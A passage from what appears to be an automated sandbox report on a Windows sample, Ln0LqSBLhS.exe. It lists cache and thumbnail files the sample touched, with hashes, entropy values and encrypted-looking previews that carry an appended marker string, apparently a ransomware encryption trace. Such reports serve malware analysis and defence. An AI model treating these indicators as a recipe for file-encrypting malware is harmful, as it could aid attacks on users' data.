                                                                                                                                                                                                    Preview: !......o.;....o..l.@gD,..w.&..s@/ED:~L ...+...OdtP{..!.q....S.g.'^.k....a...b.u.......4.].@....-.......D.!.!.?.....~.....!]p/....R.q..i%.;g%_..;...*.O.c..\..H...-..u..@w.3...%!....r......z..[...j.F.....u.T...-...i.q.w5...,..P{..$..}z....=.!..-}....^.....Fd5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_exif.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.2844213737383665
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:JaqW/HKvfbCXtKxoU1ss5J7Pa66fPtlp7y6qrXbd0dQ/PidxE44Ki75dExcii96Z:0tqvfOXoxoUjDa1flq6qrr2dQ/2pciik
                                                                                                                                                                                                    MD5:4A3E750936866D6A20409B44479C9AE2
                                                                                                                                                                                                    SHA1:C4F6C7CD2FBEE2C46DCB274444FF8922936A8E52
                                                                                                                                                                                                    SHA-256:B24AD7B1331A856F5D5E9FD23FC9D3BD13D053B894BC75C5670D341A58E4FB36
                                                                                                                                                                                                    SHA-512:18E24EE9A4E20B80916F9F4E28D68C1EEDB7347F820214986F64F71F8852943225889050A9DF72DB8B90420E05610F5D3F785038CE5DB68AAEF0A8B6CC0F476A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..I..yX..k.D.z..LQ)../......H..*. ......b.%;R c....rUo(..WW.../.T....M..I.......l%.L.^..m2l+.ef.#,.,......h.......f.G......%.o..0.6...M.}0|..Q..Y...V.4*C......-.Mn\...j//u.#.w.E..$]P5.c.^6"..r.d.L..WeG..v..5.2..j7.#k.d@..n.b|.mu...[...b.C.a....,h..DZ...?.$8b.lG.W....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.202422744595292
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:NOuhkKbMupfebke4gwbefqa8LGBDfGvF11HudYnPc9m75dExcii96Z:zMYW4eGDaF5fG4SMcii9a
                                                                                                                                                                                                    MD5:84D98122911BB75B2025F1F573C394E4
                                                                                                                                                                                                    SHA1:F4A1BCC2FF61B2826F63D3E86F138CC438C0C8E2
                                                                                                                                                                                                    SHA-256:9DC1984CA405FBE2CDC8FA828E8736D51FF64BAE084E3DD3C98D3748B378BF33
                                                                                                                                                                                                    SHA-512:135EBFD855F12EAC22870B6290E1BF0F41F2762553C5F6B69AAA347485B5A5C54F3A208FE1C6B8ADFC128FC18806B91BE2C1CF830661567307F79096300CE7C5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 77%.u...a.4v...^.... 0WJ.........)........[....6.).....8....xe...-.&..V..R..di.;..........9...W.f.`^...S,_....v{...a.m5oO..-.f....o.......pj..vagt:n.d;8..e...8.&....V..?...I...._...E.8,....A........7.z.^..m....y4..U..6!Y....[..Q..5t.u..B...Vo.....D.[.X..:5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.244064699197779
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:C3Cy//1DvL3iIblZ4qSxFGmG4hm+yzVlS9nJBD75dExcii96Z:C3Cy/5D3iWlZ4qmFPtbYVl6nJBwcii9a
                                                                                                                                                                                                    MD5:C6D9EF384850DA8CBD9D3526546716E2
                                                                                                                                                                                                    SHA1:1A9E66B4EFCFAA3AB480DF5DDB4AFFDD16AD9A78
                                                                                                                                                                                                    SHA-256:DE6DDE1D819F4B275BFC7AEADE82AE23A49952EFF58DF3362B4499B1F31B677D
                                                                                                                                                                                                    SHA-512:B30F0C469FE6B7BCED9296009C502E1CE2289A434E8C43DD42FDCFB5915458344B7E0694D47B2CC9E6CE5D7549B5EEBC27F3763D158A4760484650DA13BF6D71
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: f>....l...g..\b.A..a\@..`.....{O......B.\k.].u&9.X8.9i`.....K.FakD..=Y.R.1...T....S..oE...r/....y..*@..a.'.z...~c..........f+.OgH..*3.&iw..#...['.V.&1.B..*...kn$.H......w\..Yks.X.&...F.h../.+......w.qT.........x.K..fC...'3.......)6.:@.."..k(....u....uTd6...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide_alternate.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.206653898969652
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:GPuxTUYfW3+n+Mu/QFKmIZcdQB2md3+a+ZRG3sNx76QzsIz2OEQD75dExcii96Z:94YfW3k+MlFZIZcSB2q3FgRGYx76QAwG
                                                                                                                                                                                                    MD5:CEC6F1310E31377329FE4D0071E1A693
                                                                                                                                                                                                    SHA1:0704E6EBCF98069CBB2ED88AC202EFE7782EF0D2
                                                                                                                                                                                                    SHA-256:06F6900B28FE39F4CFFECD2DBA177F6070066D9E6D58B85965B0A353B97E9DCA
                                                                                                                                                                                                    SHA-512:72B56C9DEE5E23785D74F62467FE7F8EB903121E9EE6DADA72FBAA15A5B37D4141B3510F13CD8688612C6A4FF991C04DB53050CA73DE54A87A53BBEC3C51B5A3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: <.......p....P...~.<+....&.."`..x.Rg(.[.a&u.....H.E.........../s.}/G..;H..._@.w2.g\....w1...\1.b.V/..[........5...8.QQ6a..{.H.v8.,.2._N%5.;.qs.......3q.5.O...?x..&.fl.+#......G.{.U...!..WI^b.i..L..'.6.8.!B...sW...x-i-h.\.M.c-..7).9.....-.*.*.IL...I..<.!.W*.7.a5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.99879280071181
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:8fX4nU8opKy47Ymhy2RMSg96WiGUZ/h9YZ5DEiubhxiwirX0XIrmN0:8fKU8oEyOPh5Onuw6hxijrX9rmG
                                                                                                                                                                                                    MD5:636442AE71595200744AA6F343E377AF
                                                                                                                                                                                                    SHA1:89C420A999865C5F639E74EE3C8011FFC6986B7F
                                                                                                                                                                                                    SHA-256:C72E8472DC0C3D49539A56AA691D5FCA3503A68DD9AFBD4165D6F271BE006E1E
                                                                                                                                                                                                    SHA-512:9D067461A521AB70FAEDE6CA0F6E65ACD36FB40C318C005ECFC7F924B9D553F7EEF3C1FD8C0BA1F636C3D9C687A8F93E45FD05C171A4D766D954398A451C7C71
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: j.y5+..wT.5.......y..+.1R...JfN5mj....!ue..H..{j..=k...=..r..S.;`....._}.r%3..F..F."z.....3..P.>.H.P.....h..)\O...2$'.hX..s{c....p...v7..E.p.39.3........5.fn3r....[.L....OF/>....Z...5a>L.....zx=.E~-...w.>..uk.X..r..G..(m...7.....db...0..........M.1#./....K9\....hD..^<RX.6."....D.1.yY..0mL.c.....-5...f.T.....a..<4i.K...FY.b..|..4\.>}..V....`(..=O`'...M&...%K..9.P.M......?.9.$.....q.>..M2...5.........5}.p..R4..PV......o.~.F....acFD*.=.._....0......\.2G4.j...n....Z..7{z#../....fB.l....}...R.....[....T.@.#^..".......SqC*..ssm...&........P..{6O.].('..X..n..~v(yK<D.068.._.Rsj].ml..HLR....+.bw@.....F..h.W.L.............g......._.....Y....J...F!~.....#}..!.......W<V.2.h..?T.......No'..G` 869o..-..Pk.lj..`.....#..MCt...A\.q...,....E../.N..\.....l....Ys.....,..g.}.P:.q...]..f\LK...3...z..&.......#.{.K.s~.1.J.....j(.-.r3..t.5.......r..\5'hk...........!h=..db...v.......Z..../.G.k.E?..u.@(..M-......[..>..}s...(3l..".?.>........jp&..2_..S.WA...[qV.R.p..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\a5ea21[1].ico
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1087
                                                                                                                                                                                                    Entropy (8bit):7.800108923236669
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:oPs0bZEKSUPs43WsZED0/V7ObyKC+IWEELG1bD:oE0bZj9Pgzy/+RExlD
                                                                                                                                                                                                    MD5:59CD962C0F92801F69787812E29A840F
                                                                                                                                                                                                    SHA1:D98F2B5DA420C97EB1236CFBC95AE7C258085C91
                                                                                                                                                                                                    SHA-256:6924211C1992DCCE5A5405114B8F833438F47A3940E2896CC9FC3E83D8AC5FCA
                                                                                                                                                                                                    SHA-512:B134752AA8E66EC11EFC298EBDB73324B3B2988F7657DDB59B56D9447BFA126B909CACB281C35595CAC598C0A683FB1479E8F26CAEB5D251009303A62C9A5EE0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..<.%.C,.5.Yx.9.......N.B..........B,.b$..4...vV..R.....U.O....y..~3.` .F....fP.....B5.K?.l:...*...SQ..O.z..,G1.7f..q.`D.......WB.1l2,.P.pt.....>\.q...\....<j............W..-.#....E....EOf) .^.....HSb0~..o..a..>N.:I.#Uy..k..3e.^g7.L:.r.i...(..6..7p....Py.,^A......G....KQ...7...jb..*...e4.u....]#...L}....htx..<..2$1yn.2\J.#/.[R,..~...9.k..7)_Z.}H[..in.c.E.}.%.7..?./7.C...2. .'..b....M-..k....~...P..R&.'..u...k3.+.A..e.BNV......I`iI..U].@.DD/.r....3......e)Q.;/.+..}...........;&.....)...t.Hc..z..W...fg.M.$..J..Ws...%{.Os|...N...n.Byob..VZ.....T.. Fy...dp;..".Z..n.N..c..$.......w......Yg..)!........^.-r..<..O......7pD.*.YY.".o.~.9.....}.ylD33.a.k..32ZDB...K..J\k..%...3.a..w...........|...=...C.^.....a....Ck.z.....$+9..].O..p.MZ.^..L...}T...;.! R......-........^M..9.....8D.q...&.....>!...9*.....{..RXz...8/2...9_.$z...t....m..<t.......].`...........p8|?.@.\J!B.+.....^..$.-M..E..M.......M0.>.-.9...i.....I.U.....%..!.zu.............m...G
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\favicon-16x16[1].png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1040
                                                                                                                                                                                                    Entropy (8bit):7.7567536563405035
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:/DuY6O+YOalpVScv9b2oCHmgARPHkUdDYt1eSev7pJpA6V7MRBbD:/D/+YVXSclb2+JNmeJ7/6D
                                                                                                                                                                                                    MD5:940892FCF8C4B0BEA4B6A7EEDFFBADE3
                                                                                                                                                                                                    SHA1:34887AE7FFEAE8051F5DA35F2534C0102E5D6E01
                                                                                                                                                                                                    SHA-256:42F297C849ADAD057410DA82D1DDB0FEC03FAECCBA57C59CF1425C031341739A
                                                                                                                                                                                                    SHA-512:B867EE8CBE97C2151335D0ECE91CB9532B18E373452BA9D1BD07F9291B7203AC457AEBFA0DCF4D4B7966F404AAFF73E3E73076C8AFC589117423E3815F22B4AE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..c.nIw.$.....JTc..U.:5h...?..ww..D..S.... .....z..V.|..?.|m5.AUc..r../....V...r..=e0\7j.............E.y&.q.@...i.o....i.p.L'.3.....S.~.."kLZZK7.4...,.....e..!.7z....E..x...h6.;g.`"g..o.7gl....i....=...9.W...Z;a.......F.0.i...'.w_....4..0J..8E2.....|...XH4.K...N...N..4L..$.....3'.........>..!6bS}24_.........]......[.>;..+..i....h.XO.b..b.......L.........M..Q.;./........%.>..S.4..k....^.Q.".m.Ua..o./..3..N...."79..!m..'.T.Q#-.$o...4..)oz............|...p..^.\..<1...'(j.......2Ibw[.....u........8^....~...K|...SILu......G.,...>}0.1B.(.L.Q..j.Y..\..j............4......%mJ.....Q.L....!...G.[3.k....A.2.......(G..T.N.s..d.Y.1uGYH.].........g...s=wo..d.Ds........\dh..a.s..c.l3.!.....g.-.#...a...>.....k2NS}.O.......0TF./.#..uak0k9.R.t.......z9..7-.u..\..MA.....9..SE..z......<...t........aU4.].....H...=.j=...5D.u..b.B.[.mAc....T..!............d..-........../C.......*. .......d...V..O4.7.8...Kt..T..?>..N..+5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQ
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\update10[1].xml
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1322
                                                                                                                                                                                                    Entropy (8bit):7.827839198046972
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:GlOuM1+41TuSU3DzCZdzH13fIwYwwg919tnYsd1NjqBEEUIZ5UvyxIWbD:J1+41urGdHB1btYsdzqBEEUIZqvydD
                                                                                                                                                                                                    MD5:524BD82DE2E70F158B372B4110AAA33F
                                                                                                                                                                                                    SHA1:DCED446069B16861FD99F570AFCDA8EC14BC8405
                                                                                                                                                                                                    SHA-256:4D77887945271CD4EAEDD7B20FCE64AD778AAFA8101A6598674721F169C22E2E
                                                                                                                                                                                                    SHA-512:6841458331AA6893EBC6571727C422D3FF2AE854C48AD35CB37E5953B2BC88A0D627D0E096D41DC006E8E39CAB4CA22F2ACF5698340A48F1C5DC3225F9472524
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: <.\.q..Y..!. .....w.Bl.....[...$.....Q....,A..a..-..."$b..#|K....~.IT%..o\.K\z[*.."..1^0z...8...L....rW6.-.~...%.@L..@..........2._;W..m....^.dg...J~.[.2...~.$X#9......gp=....6......LO.0"..7..j.P~E..m...*%.OH`...4....D.G...`Eep....+. w~..w....sa9..5...6..pq....$..^..J\."a.J....h..L....r..9..1.Ik*....*q..5...(..P...kT]...Xg9.....9."....:.<..l..p.....~.....#.....$.(..q..Gn..x-B.t...n.k}}o.....qo.|..-...O..NBVH..f..J;S.>.hp...y..[M].`.....!....E.........yC.7,.....:....d.J.No]_u.$..o..<.N0..v.y..F....U1M......bt.JL..- Y(..J...'..mx;-..`.y).)<..-C...1..t.'o...9...y.N....R5......th.4.\.N.70..)..L........x.i.>....)/p......]0..-..9*.4.4."m..k......~9. .~myhg"..*9v.+9.*j..*...JC.|....9..(0.E...1.g..............4.#)....4.....{....M.....]...w.H..X..R...F....s..?.v.'E......O.....&\W..T..........F..a.(.........4i...T......*z&A...?.Z..E>/..@...........w.[..XK.Ege....w\.....v..~..4.9`Tqe.q.....a..G).5>.-.#1...a....8ylW0vA..o..ICBb.s:$K.../)...KH
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\windows-app-web-link[1].json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):439
                                                                                                                                                                                                    Entropy (8bit):7.396590684844858
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:3/86SrLfHDqn3dVi3duI3vr3TaMuTTcii9a:P86lnQuKrTeTTbD
                                                                                                                                                                                                    MD5:A8C9F2741006DB5906DD0A71FA64E5C3
                                                                                                                                                                                                    SHA1:EFDE3CF7D5399843099589E970A96F24380E7EF6
                                                                                                                                                                                                    SHA-256:B74FD6188EB3AEF61612218FF7B571038FE4894EA8515B613C15D11617D1D0C0
                                                                                                                                                                                                    SHA-512:D1341146FD78B2C9E32A9FA9F8E7308AED9469AAF942B234249FB7AFBC1A1129158464C688751C92741871CDAE0F838BE6E4728FCE54BEE7BC9DF193288A7C37
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .O..M........_..8..o..j.z .3@oZ+|.e.0..C.f...:.C..i.'.d..0>..9.....K..2..R..9r.t...~.Y.W.v6..N......../@.C..........3.....).........g.h.9b_.......J5.]..%.R5J-..4tz..qyr.....}.s.xR.u....@..e..R/..[H!T.l..0...\.....w...2X...?a.9.#..7K...Aed....2...9I.5.....q1....*.....>Jh`{.Ir.en;.{.v..O.I"'i.S..N....=.0.5.........>.....>.$..l...d..UK....(}*M.A.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJnA2[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):30269
                                                                                                                                                                                                    Entropy (8bit):7.993995290025147
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:ZgcZFEFfqgWN5mBiM2Akf6bb6L+9Dw8iaWrGZ7xJryOXRU/zVd2GjkK:x+FMmBByyKeDw8QrGdxJuOU28kK
                                                                                                                                                                                                    MD5:8A07FB66A4EF47048A9221EDA063754D
                                                                                                                                                                                                    SHA1:A3A8732F9CC0ACAD81BCC00EDFD870398B213752
                                                                                                                                                                                                    SHA-256:3D0E15AC641FC5D371648D8C20A0506405B70BBB555915754D61450C1C45D158
                                                                                                                                                                                                    SHA-512:7C321F7A617E6E036BF0A6F3BB4459CEB7BA41AF5D24792DD5C5BF4A00E22ADD5C49E2D5A1C8761B9BBC741C54790AA27EAD5F97B1F765442B7CA34950A5F352
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: "ed{......:...0.>...2.f........r...w.....\r..E..68C<...G.\./.~..\..J.>q~-.S.....|7v.W`..5...u..AN["....J......a.H.nTp<B`.w.hD..-.V...xev.?.<nB.3<t......D..G&....[E....~.|.|zG#.....2....M...v..Y......@(..F_./......U\%.......>.n.M.......!......9..XO.y.uj.D.F.v...3.......!...pzvwI.r...JA~.....*..G..!e..1#..y~...t..Z?<Xt.F..&...0K..E.{..I1..Q....N...A........6.7a\jg5x......C...$....6.1..%....<...*v......9...|....'..D&DF...N.....ZF...p.....+^E.O.T**.....U$..Vi......--6.....-..X.i..M..3...)~_..@..^.Ig;=..9FE. ...OW......^..N..e.R...s...kGr<1........}a~..r9,(..[>W.|_..F.Z.-.P..:@......vZ[i.M+"}.v.AM...JCDye.l..1..._..~.]..Q+.Zr..(..}.^$.#..90_....u....._._.....D.......~./..nX.C..g\y...D..vW.d....Y.&Vy6.v......3..wa....@...L.M....8.cg,.....~%...i&.B....f......rv7..u..l..\.n...B.......%P.E@|.k!.D.I....O..I..n..A^.e..r.0.-tz....f...E>Mt...?.&.>........l.....".r.zz.W...R.....n..d...!.....S>.u..<..-nQ.............F=.2....($yn..5.........%.K.....P(.....bSj.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\PreSignInSettingsConfig[1].json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):30121
                                                                                                                                                                                                    Entropy (8bit):7.994401444142447
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:/fRf/1GArwqlOtebzM4y7F7AirQr/wiD4GFd:htrPlux7AirW/xD46
                                                                                                                                                                                                    MD5:F15332222A72596BFAEA2580304B3601
                                                                                                                                                                                                    SHA1:65E187D835145A529A601CC66DDF4A77CDF4A3D0
                                                                                                                                                                                                    SHA-256:1FEDC03C14F1DCEB21447C6A5F10410FD9A61E1BBC21DD5B9992580120F0F6B5
                                                                                                                                                                                                    SHA-512:B603A8BB776A15EC887EC3DAA83E9030D14AD3B87D892D9C81806ECD6C1BC4A07506372B0CED3F11475C3B65FFA20A6D78E6C188576F8664AC8869C9B90D1027
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: . S....8/.q..~.Yo...f.@.W..;....)$9..vM.R...H.e.A....?..%Ty.bS.68.1I......>+D~r&..NJ5.9MG}...#.R.PK..<.I2.....{.j...m..z......8.."UV.....7{.S... < ....<....wkQ)z ....vU..t!W.....C....|.c.d../K.tZ.7..#Y..5.q..q...I..A...A.._6.s.`.v....z.=.(f..!4.\.''._..&..S........u....x".-X..%gd.$Z8^..$...tTaj..>.#&..;.M.u.s.-..t..........Z.@So.E.s...k$K .A..x...&#...Gs.(Z.2.UBv=..989.%.U..(..].....%..:....-...4.w..&...%...........i..MN..&.kw$...g...4......=h.$..9Xk..'..."....0.>....VM{..).Z3.h..........G.M...H.K...4v}..P..........3...(..4..u5M......F...7w'.G.a...q........R.r.a*.c..".qX.r...K.:......L{........~...b....L..i.ABu.;.......g$*..D2..<Rm.^.{a..U_,/^L..m/I...r%7'.R..."......$. us..z...1.^.{.........~.U...J.3!.]2uE.S5..@..)..M.}1.h......(f.W.P..|X..{....a.Q.{nJ...9l&GiP...].K..'.j.n.#.:e.6...*=..U..'.v.........d..?I4.4Wd\....O.H..'/.9.qh.7r.}..U6.FT..9-^.F....=#+.H.;....`. .i..m..&.v.^!.......;.~,....G.x.....@...{..wp..c.XE....d..(.x..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\RdrManifest3[1].msi
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):15177
                                                                                                                                                                                                    Entropy (8bit):7.987422586138198
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:JK7bT4VnVeWzQODS9zeEvQtQFP28ze+fKUw7OzKZE/yM:CWQWzQQwzeEv+c28S+JF+VM
                                                                                                                                                                                                    MD5:DBE7AEBB016EEF8C08C4B8F8629AA768
                                                                                                                                                                                                    SHA1:08216A659DC0740EAEDE6A81326F60FD818CF7C6
                                                                                                                                                                                                    SHA-256:E64223299EA669964DE5D8207A53A11F9EBFC6C4AC849AF98F08C580929744B0
                                                                                                                                                                                                    SHA-512:928325B351675FF1BA28DB7D3BC524123D37CCFC2137E06A7DEE75808D5634AF8D1098718726B61944A7EFA1CD3F5D9EE86ADA5296C12C35CDA51340ADEED2EB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......wg.............l.N.R.t.j.Ol........h.....A....T...&.. @A.n..@..e.\..R....MXS=....a.pNZg..X....-..kJ.......1......\..rnC."..Y.2P..b.7.n.t......2...i...}..........^...2}..H.7..Z...$Z.s.....g.. .=X.b....Rg.&.+ .O5..H.ti.\....Gy...........4j.././.JR?.K...Y.u...#!..QS.G......z..V...}..@.,.iv.te.VT.QX.......3.....+*..u...#.Fz...I..\&.d.F..h:K.g,h.X..>.#US.Nl.N.}.4........=m.b.c.".....An.~..1..Vtx.x.Q......*l.{wIBy.,..k....4]..ui3C..AWv..N7....2U...C.l".....[...? 7..@... ..m4.(..Q...!.$..,.c8......g.H..01.....3a.b.......V....J..6..yG...J1V.....1..ho].......,..Xfz.4.x........UUD...X.(...LR0.........z;...K_..Gn#....b7..l...x.....N.....lN...*.T... .sd.......)H.%...OZjQ~S..K..[...j.=H](.\.....8r....?K-..V_.....)........JA.q.Q[.0.F(..b..1..J...^V.le...1!.j-.d-.....J.......Y.5Rq.,ZY...=..........y.r|..1..z..Eh.:.m...[.U...a.....n.,U+....A.E..-.\g.gg..u8....."../..f...G".)...zD.R.....P.......q#?..}.}..3R.....4.t.ye.Lq..y.Y.5..VPYv.;
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\bing_p_rr_teal_min[1].ico
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):639
                                                                                                                                                                                                    Entropy (8bit):7.615417673293133
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:6U0/x488QyQWnYb7WelHRLye17jB1fKhMOvx//JgjYRscii9a:msy77Ll1791zOp/mkybD
                                                                                                                                                                                                    MD5:20BC0E4C47D7F6CC2C6980646379991E
                                                                                                                                                                                                    SHA1:649C1DAD5E407668C525D112400FE8A6E16A5990
                                                                                                                                                                                                    SHA-256:B497958FAD4890AE62DE113C657E087AD54CC653D37C057528A836762AA53B46
                                                                                                                                                                                                    SHA-512:53044FFC2F756E3290EB48D7DE68809561699ABB75A9970B1AD5A6B66C816AD89A6FFE532A48F7533CDAE004446549D900592CE9781257721052D803091A7699
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...cZ.........X.8.....q.......j|I.V^..T.).u....NX...l..Z..F3.?.$ ..G.....^u9.......B.X...'...Y3gP...Q?"....P.@v`t)S...........O..G0...................ML..We..Ns....-r..+.;..r..da..r*y.../.K.+.S.v.....i.........9...>.(...*.H4 ..Z.2e.o..6e.....>....R.....a...a.S{..{...g..8G".%.../..p.V.I8.6...R%..P<%QQ..<...fi.&.!.+....7S{..q...I...*Y..Z../....../.2.k$6M..6~...2k..:.?qQ....).G\.......5.....T..7../.I...u......|E..C...9?ov......P.......:x....C.kx=.L]..F...-!..O...;.vu.J.$\........R...2..iI.9|.....+.ZU,q.~..d.)Q..I.8.......t.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\suggestions[1].en-US
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):18505
                                                                                                                                                                                                    Entropy (8bit):7.990890073676279
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:L6euKn29l8sh34J2whBjrjnZgV57XTDJigxsGD3hcF5N2e:ee1neJdERXZe5DDbDxcF5Ae
                                                                                                                                                                                                    MD5:3368F50EF36558AD0DC66312DA13D5D6
                                                                                                                                                                                                    SHA1:FFD11186882DC5181569A8A605C80D6770B9D90A
                                                                                                                                                                                                    SHA-256:B52F8058F273628C40F2CCEBF2BCFFE77795391EE4E4B965DDB66934E33F56A9
